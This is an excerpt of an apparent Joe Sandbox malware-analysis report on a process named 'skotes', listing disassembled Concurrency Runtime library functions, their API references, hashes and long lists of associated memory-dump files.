                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1091748018-0
                                                                                                                                                                                                                                          • Opcode ID: ce9cb2002ea0296db1f28bb8666b90b1635cf089937f13563fc27fd7de449115
                                                                                                                                                                                                                                          • Instruction ID: 8e40aa01fc6ab53b61142df158b89f437a58d1717dda5a2aa9e2ebaad54ff407
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce9cb2002ea0296db1f28bb8666b90b1635cf089937f13563fc27fd7de449115
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4941E3F0604210ABDB19AB24C886BFDBB7BAF45320F14409DE5069F3C2DB74AD85CB95
                                                                                                                                                                                                                                          Function 006B56AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 006B56F2
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 006B5726
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 006B578B
                                                                                                                                                                                                                                          • SafeRWList.LIBCONCRT ref: 006B579A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 893951542-0
                                                                                                                                                                                                                                          • Opcode ID: e8d996556311259958e62605e43b74c40d53540c81b6a255b5192267b77b454b
                                                                                                                                                                                                                                          • Instruction ID: 510f316e6c4e5a2d56e920330b6116cfc0a3f1a95ce71fe43c51c444dbabdd44
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8d996556311259958e62605e43b74c40d53540c81b6a255b5192267b77b454b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E31F376B016109FCB099F20C885AED77A7AFC9710F194279E9069F396DF70AD418B90
                                                                                                                                                                                                                                          Function 006B2CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 006B2D0F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3433162309-0
                                                                                                                                                                                                                                          • Opcode ID: 6987e27c78233f1d4d1a901dd02c863a4c7d6fc3804eb518d8824eb064b83de3
                                                                                                                                                                                                                                          • Instruction ID: 316397c62afc7c7b9e28981f96fe3e400e69a45a1f4a2937a750b756207ff8e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6987e27c78233f1d4d1a901dd02c863a4c7d6fc3804eb518d8824eb064b83de3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C3108B5A0030ADFCF10DF94C490BEE7BBAAF44714F1404AAD9059B346D770A985DBA1
                                                                                                                                                                                                                                          Function 006C13F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006C13FC
                                                                                                                                                                                                                                          • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 006C1447
                                                                                                                                                                                                                                          • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 006C147A
                                                                                                                                                                                                                                          • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 006C152A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
